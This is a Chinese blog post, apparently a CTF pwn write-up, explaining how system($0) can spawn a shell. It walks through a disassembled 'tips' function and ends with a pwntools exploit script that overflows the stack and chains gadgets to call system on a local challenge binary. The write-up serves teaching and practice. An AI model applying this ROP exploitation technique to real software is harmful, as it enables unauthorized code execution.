ret2text(system($0))

已于 2024-03-15 19:29:59 修改
阅读量856 收藏 7
点赞数 32
文章标签: 服务器 安全 运维
于 2024-03-15 18:22:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79899078/article/details/136745697
版权

system($0)介绍

在正常的编程或系统使用中,system($0) 本身并不会直接导致获取任何权限。$0 是一个特殊的 shell 变量,它代表当前脚本或程序的名字。在 C 语言中,如果你使用 system() 函数来执行一个 shell 命令,那么传递给 system() 的字符串会被当作 shell 命令来执行。

如果你尝试执行 system($0),你实际上是在尝试执行一个名为当前脚本或程序名字的 shell 命令。这通常没有特殊的权限提升效果,除非该名字恰好指向了一个具有特殊权限的脚本或程序。

权限的提升通常涉及到利用系统漏洞、执行具有更高权限的程序或脚本、或者通过其他机制(如 sudo)以更高权限用户身份执行命令。

例如,在 Unix 或 Linux 系统中,一个用户可能通过配置 sudoers 文件来允许某些用户或用户组以超级用户(root)权限执行特定的命令。在这种情况下,即使一个普通用户运行了一个脚本,该脚本中的 system() 调用也可能以更高的权限执行命令,但这需要 sudo 的配置和用户的显式同意(通常是输入密码)。

如果你听说 system($0) 能够获取权限,那么这很可能是在某种特定的攻击场景或上下文中提到的。在这种情况下,攻击者可能利用了某些特定的系统配置或漏洞来执行恶意代码,并且 system($0) 只是攻击链中的一环。然而,这并不意味着 system($0) 本身具有获取权限的能力;而是攻击者利用了其他条件来实现这一点。

总之,system($0) 本身并不会导致权限的提升。权限的提升通常涉及到更复杂的机制和条件,需要攻击者具备相应的知识和技能。

例题

我们看道例题

经典nx,栈迁移,本该是很简单的一道题,但是涉及到system($0),就难理解了一点点,仅仅是一点点

废话不多说,距离rbp,0x10,填充0x18覆盖rbp,构造ret,这时候我们发现有system函数,没有/bin/sh,怎么办,可能有小伙伴想ret2libc,当然可以,但是太过麻烦,我们发现有的tips函数还没有看

 我们直接进去西索

我们详细分析这串代码:

这段文本是一个反汇编代码片段,它描述了一个名为 tips 的函数或过程的汇编实现。我会为你逐行解释这段代码:

 

.text:0000000000400537 public tips
 

这行标记了一个名为 tips 的公共符号,表示这是一个可以被其他模块或代码引用的函数或过程。
 

 

.text:0000000000400537 tips proc near
 

这行定义了 tips 过程的开始,proc near 表示这是一个近程调用过程(即,它的跳转和调用通常在相同的代码段内)。
 

 

.text:0000000000400537 ; __unwind {
 

这是一个注释,它可能是关于异常处理的元数据或提示,尽管在这段代码中它并不直接影响执行流程。
 

 

 

.text:0000000000400537 55 push rbp
 

这行代码将当前的基指针寄存器(rbp)的值压入栈中。这通常是为了在函数内部保存原始的栈帧指针。
 

 

 

.text:0000000000400538 48 89 E5 mov rbp, rsp
 

这行代码将当前的栈指针寄存器(rsp)的值移动到基指针寄存器(rbp)。这是设置新的栈帧的开始/
 

 

 

 
 		.text:000000000040053B B8 00 00 00 00 mov eax, 0
 

这行代码将累加器寄存器(eax)的值设置为0。这通常用于准备返回值或用于其他计算。
 

 

 

.text:0000000000400540 E8 24 30 00 00 call near ptr 403569h
 

这行代码调用了一个位于地址 403569h 的函数或过程。E8 是调用指令的操作码,而 24 30 00 00 是相对偏移量。
 

 

 

.text:0000000000400545 90 nop
 

这是一个无操作指令(nop),它什么都不做。它通常用作占位符或用于对齐代码。
 

 

 

.text:0000000000400546 5D pop rbp
 

这行代码从栈中弹出一个值,并将其放回 rbp 寄存器中。这是函数结束时恢复原始栈帧指针的过程的一部分。
 

 

 

.text:0000000000400547 C3 retn
 

这行代码是一个返回指令。它将从栈中弹出一个值作为返回地址,并跳转到该地址。这标志着 tips 函数的结束。
 

 

 

.text:0000000000400547 ; } // starts at 400537 
.text:0000000000400547 tips endp
 

这些是注释,标记了 tips 过程的结束,并给出了其开始的地址。
 

总之,这个 tips 函数似乎很简单:它设置了新的栈帧,可能执行了一些操作(尽管在这段代码中看不到),然后调用了一个位于 403569h 的函数,最后恢复了原始的栈帧并返回。
 

 

这里可以使用system($0)来获得shell权限。
 首先用垃圾数据填充栈,进行栈溢出,然后将数据放入$0放入rdi中,然后跳到system函数执行。
 

exp
 

from pwn import *
    
context(os='linux',arch='amd64',log_level='debug')
p= process('./system0')
elf=ELF('./system0')
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ret=0x0000000000400416
rdi=0x00000000004005e3
tip=0x400541
system=0x400430
payload=b'a'*(0x18)+p64(ret)+p64(rdi)+p64(tip)+p64(system)
p.send(payload)
p.interactive()


                

        

        

    




    

      

        

            

              
                
                  諍宁
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    32
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    7
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                  1
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
带exp的pwn测试文件

				
			

			

				

					09-12
				

			

		

		

			
				
这些文件涵盖了多种经典的漏洞利用技术,如ret2text、ret2syscall、ret2shellcode、ret2libc、ret2csu、stack_pivoting、stack_smash以及SROP(Secure Return Oriented Programming)和frame_faking。下面将详细介绍...

			
		

	



                

              
                



	

		

			

				
					
KingbaseES的参数设置介绍(二).docx

				
			

			

				

					10-12
				

			

		

		

			
				
示例:CREATE OR REPLACE FUNCTION kdb_func() RETURNS VOID AS $$ DECLARE ret TEXT; BEGIN SHOW WORK_MEM INTO ret; RAISE NOTICE '%', ret; END; $$ LANGUAGE plsql STRICT SET work_mem='15MB';  六、语句中的...

			
		

	



                


  
              

                


	

		

			

				
					
day5——system($0)

				
			

			

				

					m0_73858054的博客
				

				

					12-01
					
					83
					
				

			

		

		

			
				
所以,无论是用哪种方式,最终达到的目的都是通过shell来执行特定的命令。但需要注意的是,在某些情况下,我怀疑ret那句话不能加的原因就是在这里,但是我不理解因为加上那句话之后payload的长度刚好满足0x38,很明显没有超过…这是因为两者都会调用系统的shell来执行参数中指定的命令。做这道题的时候他那个read限制读入的长度给我整麻了,虽然这里没啥影响,但是后面还是要注意一下。但是没有‘/bin/sh’字符串,不过在上面名为tips的函数中发现了$0的机器码。哎呀,昨天居然忘了发了,今天先发一下吧。

			
		

	





	

		

			

				
					
[蓝桥杯2024]-PWN:fd解析(命令符转义,标准输出重定向,利用system(‘$0‘)获取shell权限)

				
			

			

				

					2301_79326813的博客
				

				

					04-27
					
					581
					
				

			

		

		

			
				
查看保护查看ida这里有一次栈溢出,并且题目给了我们system函数。这里的知识点没有那么复杂。

			
		

	



		

			
		



	

		

			

				
					
【PWN · 总结】system返回shell(‘/bin/sh‘、‘sh‘、$(0))

				
			

			

				

					Mr_Fmnwon的博客
				

				

					05-31
					
					3140
					
				

			

		

		

			
				
pwn题中要通过system/excute等返回shell,进而cat flag。今天遇到一题,参数$(0)也可返回,有必要记录一下。

			
		

	





	

		

			

				
					
bugku pwn4 学习

				
			

			

				

					欢迎来到神林的博客
				

				

					08-27
					
					1177
					
				

			

		

		

			
				
2019-08-25 bugku pwn4 学习
1.拿到题目先file 一下文件看看文件属性
查看得知是64位动态链接库的文件。2.checksec 查看是否开启什么保护然而并没有什么保护PIE 保护指定是对代码段进行保护3.IDA查看内容
看到了敏感函数system,看着想办法跳转4.查看main函数,有栈溢出的敏感函数 read
想办法利用read 函数5.查看read函数栈中内容
完全能够...

			
		

	





	

		

			

				
					
[GFCTF 2021]where_is_shell

				
			

			

				

					沈理大学牲的博客
				

				

					11-13
					
					450
					
				

			

		

		

			
				
在ROP攻击中,攻击者利用程序中存在的这种gadget,通过精心构造的数据将程序控制流引导到这个gadget,从而实现对程序行为的控制。通常情况下,攻击者会将需要的参数放置在栈上,然后利用ROP链将控制流引导到 "pop rdi;ret" 这样的gadget,将参数加载到合适的寄存器中,然后再执行调用目标函数的ret指令。在x86_64架构中,这个gadget的作用是从栈中弹出一个数值,并将其赋值给RDI寄存器,然后进行返回。先覆盖到地址,然后执行ret,ret用来返回弹出的地址,然后执行pop_rdi;

			
		

	





	

		

			

				
					
springboot使用xxl-job(注册执行器)

				
			

			

				

					08-07
				

			

		

		

			
				
### 2. 创建 Job Handler  XXL-Job 通过 Job Handler 来执行具体的任务。你需要创建一个实现了 `com.xxl.job.core.handler.IJobHandler` 接口的类,并在其中编写你的业务逻辑。例如:  ```java package ...

			
		

	





	

		

			

				
					
【ASP.NET编程知识】.net core使用MD5加密解密字符串.docx

				
			

			

				

					05-15
				

			

		

		

			
				
 i = Convert.ToInt32(Text.Substring(x * 2, 2), 16);  inputByteArray[x] = (byte)i;  }  des.Key = ASCIIEncoding.ASCII.GetBytes(Md5Hash(sKey).Substring(0, 8));  des.IV = ASCIIEncoding.ASCII.GetBytes(Md5...

			
		

	





	

		

			

				
					
基于c#的图像处理源代码

				
			

			

				

					12-11
				

			

		

		

			
				
 ret = (int)(curColor.R * 0.299 + curColor.G * 0.587 + curColor.B * 0.114);  curBitmap.SetPixel(i, j, Color.FromArgb(ret, ret, ret));  }  }  myTimer.Stop();  timeBox.Text = myTimer.Duration.ToString(...

			
		

	





	

		

			

				
					
AWK学习笔记

				
			

			

				

					jeffreyst的专栏
				

				

					11-01
					
					1243
					
				

			

		

		

			
				
AWK学习笔记


如下的内容来自《sed&awk》和自己的一些体会,如有不妥的地方,烦请指正,多谢~

1.AWK是基于输入语句的,文件中有多少句子,AWK就会被调用多少次。
这个循环是AWK提供的,不用我们去实现。


2.awk的基本结构包括三部分
由于awk主要是处理输入的文件内容的,所以:
  2.1执行前-->输入前执行的操作,有"BEGIN"标示,
  2.2

			
		

	





	

		

			

				
					
在awk中执行system命令------太有用了

					
热门推荐

				
			

			

				

					认知  行动  坚持
				

				

					12-05
					
					1万+
					
				

			

		

		

			
				
有这样一个临时需求: 在a.txt文件中有一万行字符串, 而二进制文件test能解密任何一行, 格式为./test decrypt xxx,  现在要把a.txt的所有行解密出来, 存放在b.txt, 怎么搞?
        我一开始的思路是: 写程序逐行读取a.txt, 然后在程序中循环执行system("./test decrypt xxx"),  看看, 这是多个SB的事情啊。 为什么不

			
		

	





	

		

			

				
					
Linux下调用system()函数导致的问题

				
			

			

				

					fengxinze的专栏
				

				

					10-23
					
					7007
					
				

			

		

		

			
				
原文:http://blog.chinaunix.net/space.php?uid=20732057&do=blog&id=763540


前一段时间用了system()函数调用脚本启动另一个进程,发现两个问题:
1.执行killall命令杀新启进程时会连原进程一起kill掉.
2.原进程打开的侦听端口,如果新启动的进程不退出无法释放(socket资源未释放).
查看system(

			
		

	





	

		

			

				
					
【转】system函数

				
			

			

				

					weixin_30419799的博客
				

				

					07-19
					
					918
					
				

			

		

		

			
				
Linux下system () 函数详解简介
  (执行shell 命令)
  相关函数
  fork,execve,waitpid,popen
  表头文件
  #include<stdlib.h>
  定义函数
  int system(const char * string);
  函数说明
  system()会调用fork()产生子进程,由子进程来调用/bi...

			
		

	





	

		

			

				
					
Bugku pwn4

				
			

			

				

					BengDouLove的博客
				

				

					02-16
					
					369
					
				

			

		

		

			
				
bugku pwn4
先ida打开elf文件,发现是64位,之前知道64位和32位有所不同但是还没有接触到过
程序里没什么,然后打开字符串子视图

有这么一句话,引起怀疑,然后双击点开,右键点开外部引用图表到

发现0x400751这个函数在调用这一段字符串,打开400751并且反汇编,发现是system函数,里面的参数正是这一段字符串,想到如果里面是系统指令就好了。
打开虚拟机,调试过程中也没有...

			
		

	





	

		

			

				
					
Pwn入门笔记(五)ROP

				
			

			

				

					qq_33590156的博客
				

				

					11-29
					
					667
					
				

			

		

		

			
				
ROP32位的ROP64位的ROP
32位的ROP
这个在栈基础中提到过,此处写出是为了和64位的形成对比。通过在返回地址上写上函数PLT的地址来实现跳转到函数,调用函数时压入参数后会压入eip(返回地址),然后32位程序参数在栈上,所以结构如下图:




栈底-高地址->
c





b



a


实际调用函数中的返回地址eip
dddd


原返回地址(r)
system的plt表地址


原ebp (s)
aaaa



aaaaaaaaaaaaaaa…


栈顶-低地址->
…


			
		

	





	

		

			

				
					
system函数调用

				
			

			

				

					dianmotang8246的博客
				

				

					10-02
					
					345
					
				

			

		

		

			
				
相关函数 fork,execve,waitpid,popen 表头文件 #include<stdlib.h> 定义函数 int system(const char * string); 函数说明 system()会调用fork()产生子进程,由子进程来调用/bin/sh-c string来执行参数string字符串所代表的命令,此命>令执行完后随即返回原调用的进程。在调...

			
		

	





	

		

			

				
					
java怎么取到字符串{"phone":"15555381897","retCode":"0","retMsg":"校验成功"},不适用substring方法

					
最新发布

				
			

			

				

					04-29
				

			

		

		

			
				
 String jsonString = "{\"phone\":\"15555381897\",\"retCode\":\"0\",\"retMsg\":\"校验成功\"}";   try {  ObjectMapper objectMapper = new ObjectMapper();  JsonNode jsonNode = objectMapper.readTree(json...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 1

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值